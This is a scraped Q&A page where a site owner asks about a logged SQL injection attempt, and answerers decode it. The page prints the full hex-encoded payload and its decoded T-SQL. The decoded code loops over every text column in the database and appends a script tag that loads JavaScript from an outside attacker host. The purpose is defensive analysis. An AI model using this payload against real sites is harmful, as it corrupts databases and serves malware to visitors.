Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

Attempted SQL injection attack - what are they trying to do?

Tags:

I have a public facing website that has been receiving a number of SQL injection attacks over the last few weeks. I exclusively use parameterised stored procedures so I believe that there has been no successful attacks, but a recent log showed an interesting technique:

Line breaks added for clarity

 http://www.mydummysite.uk/mypage.asp?l_surname=Z;DECLARE%20@S%20CHAR(4000);SET  @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263  686172283430303029204445434C415245205461626C655F437572736F7220435552534F  5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F 626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E69  6420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F72  20622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970  653D31363729204F50454E205461626C655F437572736F72204645544348204E45585420  46524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528  404046455443485F5354415455533D302920424547494E20657865632827757064617465  205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C  736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F6373  7273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D2077  6865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73  6372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F637372  73732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854  2046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E442043  4C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43 7572736F72 AS CHAR(4000));EXEC(@S);&_X=" 

Can anyone shed light on what the "CAST and EXEC" is attempting to do?

like image 560
Guy Avatar asked Oct 14 '08 09:10

Guy


People also ask

What is an example of what a SQL injection attempts to do?

Some common SQL injection examples include: Retrieving hidden data, where you can modify an SQL query to return additional results. Subverting application logic, where you can change a query to interfere with the application's logic. UNION attacks, where you can retrieve data from different database tables.

What is the goal of a SQL injection attack?

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

Why would someone use SQL injection hack?

Attackers can use SQL Injection vulnerabilities to bypass application security measures. They can go around authentication and authorization of a web page or web application and retrieve the content of the entire SQL database. They can also use SQL Injection to add, modify, and delete records in the database.


2 Answers

Below is the decoded SQL that they were trying to push:

DECLARE @T varchar(255),         @C varchar(4000)   DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b  WHERE a.id=b.id  AND a.xtype='u'  AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)   OPEN Table_Cursor FETCH NEXT  FROM Table_Cursor INTO @T,@C  WHILE(@@FETCH_STATUS=0)    BEGIN exec('update ['+@T+'] SET ['+@C+']=''"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''+['+@C+'] WHERE '+@C+' NOT like ''%"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''')   FETCH NEXT FROM  Table_Cursor INTO @T,@C  END CLOSE Table_Cursor   DEALLOCATE Table_Cursor 
like image 96
Ishmaeel Avatar answered Oct 20 '22 03:10

Ishmaeel


The code, when decyphered from hex into chars, seems to go through all your database tables, select all columns that are of text/char type, and at the end of each value of this type add a malicious script execution from http://www2.s800qn.cn/csrss/w.js. Now if in your website, you have at least one place where you don't escape text data retrieved from your database, your site's users will have this malicious script executed on their machines.

like image 28
DzinX Avatar answered Oct 20 '22 05:10

DzinX